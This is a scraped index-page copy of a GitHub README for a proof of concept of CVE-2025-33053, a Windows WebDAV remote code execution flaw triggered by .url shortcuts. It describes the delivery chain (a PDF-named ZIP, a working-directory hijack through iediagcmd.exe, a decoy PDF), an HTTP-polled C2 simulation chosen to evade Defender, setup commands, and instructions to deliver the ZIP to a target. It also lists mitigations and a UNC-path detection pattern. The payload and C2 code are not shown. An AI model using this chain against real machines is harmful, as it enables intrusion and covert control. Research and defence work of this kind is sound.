来源

关联漏洞

描述

Proof-of-Concept for CVE-2025-33053  Exploiting WebDAV with .url file delivery to demonstrate realistic remote code execution. Includes a decoy PDF payload and a video-only showcase of potential command-and-control capabilities.

介绍

# CVE-2025-33053 - WebDAV Remote Code Execution (RCE) PoC & C2 Simulation

> **⚠️ Educational Purposes Only**
> This project demonstrates a proof-of-concept exploiting WebDAV and `.url` file delivery to achieve realistic remote code execution. It includes a decoy-based executable and a controlled simulation of command-and-control (C2) capabilities. No malicious payloads are shared.

---

## 📜 Summary

This repository contains a PoC for **CVE-2025-33053**, a vulnerability in how Windows handles `.url` files pointing to a WebDAV share. The PoC demonstrates how an attacker could:

* Deliver a `.url` shortcut via ZIP (`Invoice.pdf.zip`)
* Trigger execution of a payload hosted on a WebDAV container
* Open a benign-looking PDF while executing malicious logic in the background
* Optionally simulate C2 behavior (e.g., creating folders)

> The actual C2 code is **not included**  only a demonstration video is provided.

---

## 🎬 Demo Videos

### 🔹 Video 1 — Decoy Execution
https://github.com/user-attachments/assets/27ada7f9-9b02-4281-b002-da7afcdffe21

Shows the `.url` file triggering `route.exe`, which opens a fake PDF and displays a popup:

> *"Execution complete. No alerts triggered. You may continue pretending you're safe."*

### 🔹 Video 2 — C2 Simulation


https://github.com/user-attachments/assets/d3908eb7-3126-4ec1-ae60-a0373b877a50


Very simple command and control mechanism. Simulates a stealthy C2 by executing remote commands (e.g., creating a folder and calc) fetched via HTTP. No shell, no noise just silent control.
Reverse shells get captured and stopped by the Microsoft Defender. Here as you can see I just edit a file which is accessible to the victim machine and it will be fetched by the machine via http; strip the content then executed. that task is handled by that custom Route.exe

> ✅ Videos available in the `demo/` directory.

---

## 📂 File Structure

```
CVE-2025-33053/
├── docker-compose.yml                  # WebDAV container config
├── setup_webdav_payload.py                 # Automates setup + zipping
├── Important-Document.pdf.zip         # Contains disguised .url ( After the script )
├── webdav_data/			# ( After the script )
│   └── data/payload/route.exe         # Payload (PDF + logic) 
├── cleanup.sh 				# Docker + Directories + webdav_data cleaner
├── demo/
│   ├── 1_decoy_execution.mp4
│   └── 2_c2_simulation.mp4
```

---

## 🧪 Running the PoC

1. **Clone the repo & navigate to it**

```bash
git clone https://github.com/kra1t0/CVE-2025-33053-WebDAV-RCE-PoC-and-C2-Concept.git
cd CVE-2025-33053-WebDAV-RCE-PoC-and-C2-Concept
```

2. **Run setup script**

```bash
python3 setup_webdav_payload.py
```

> This sets up Docker, creates folders, Moves the pwned.exe, generates `.url`, and packages the `.zip`

4. **Deliver the ZIP and open on target**

* `Invoice.pdf.zip` → user opens / Unzips and double-clicks `.url`
* Execution begins from WebDAV without any warnings
( Sometimes the Microsoft Defender does alert you that this file should be scanned by the admin. )

---
## 🧱 Affected Versions

CVE-2025-33053 affects the following Windows versions:

Windows 10 (1809 – 22H2)

Windows 11 (21H2 – 23H2)

Windows Server 2016 / 2019 / 2022

Systems with WebClient service enabled

Systems where .url files are not blocked or sanitized

**🛠️ The vulnerability was patched in June 2025 cumulative updates.
You can find [patch links](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-33053) in the Microsoft Patch Notes.**

## 🧠 How It Works

1. **The Shortcut Trick** The `.url` file launches a trusted Windows utility (`iediagcmd.exe`) but sets its working directory to an attacker-controlled WebDAV share.
2. **DLL/Executable Hijack** That utility uses `Process.Start()` to run commands like `route.exe`. Windows looks first in the working directory, allowing the malicious binary from WebDAV to be executed.
3. **Stealth Falcon’s Delivery**  In real attacks, APT actors zipped the `.url` into misleadingly named archives (e.g. `...pdf.zip`) and hosted them on trusted domains over HTTPS. The payload chain then delivered a decoy PDF and loaded a custom C2 loader (“Horus Agent”) capable of in-memory shellcode injection, process cloaking, and remote commands.
4. **Active Exploitation.** The exploit was used in March 2025 against defense organizations in the Middle East. It’s high-impact (CVSS 8.8) and included in CISA’s Known Exploited Vulnerabilities catalog.

---

## 🛡️ Mitigation & Defense

| Mitigation Strategy                             | Description                                                                                                               |
| ----------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------- |
| **🔄 Apply Microsoft Patch**                    | June 2025 cumulative updates address CVE‑2025‑33053 across Windows 10/11 and older Server versions.                       |
| **🔒 Disable WebDAV Client**                    | For systems without WebDAV needs (i.e. most modern setups), disable the “WebClient” service via Group Policy or registry. |
| **📥 Train Users to Avoid Suspicious Archives** | Don’t open `.url` files from ZIP/ISO emails, even if they appear document-like.                                           |
| **🕵️‍♀️ Monitor WebDAV Traffic**               | Look for outbound UNC connection patterns like `\\<host>@443\DavWWWRoot\...` these may indicate exploitation attempts.        |
| **🛠 Deploy WAF/IDS Rules**                     | Block WebDAV-related methods (e.g., `PROPFIND`) or UNC paths to untrusted domains.                                        |
| **⚙️ Harden Edge/SmartScreen Policies**         | Restrict handling of `.url` files and archives via browser settings or secure email gateways.                             |

> ✅ **Immediate priority**: install the patch — CISA requires federal agencies to remediate by July 1, 2025

---

## ❌ What’s NOT Included

* No C2 command server code
* No reverse shell scripts or malware
* No exploitation of real systems

---

## 🔗 References

* [Microsoft Patch Notes – June 2025](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-33053)
* [CISA KEV Catalog](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)
* [Elastic Threat Report: Stealth Falcon Exploitation](https://www.elastic.co/blog/stealth-falcon-campaign-2025)
* [CERT-EU Alert](https://cert.europa.eu/article/webdav-url-hijack-apt)
* [Microsoft Defender AV & SmartScreen Advisory](https://learn.microsoft.com/en-us/microsoft-365/security/)

---

Crafted with attention to realism, red team tradecraft, and ethical disclosure by [@kra1t0](https://github.com/kra1t0)

*Precision in Chaos*

文件快照

 [4.0K]  /data/pocs/051891296626677ad2656a3ca3ac69fc81370746
├── [ 218]  cleanup.sh
├── [4.0K]  demo
│   ├── [2.1M]  1_decoy_execution.mkv
│   └── [6.2M]  2_c2_simulation.mkv
├── [ 566]  docker-compose.yml
├── [7.1M]  pwned.exe
├── [6.8K]  README.md
└── [2.2K]  setup_webdav_payload.py

1 directory, 7 files

备注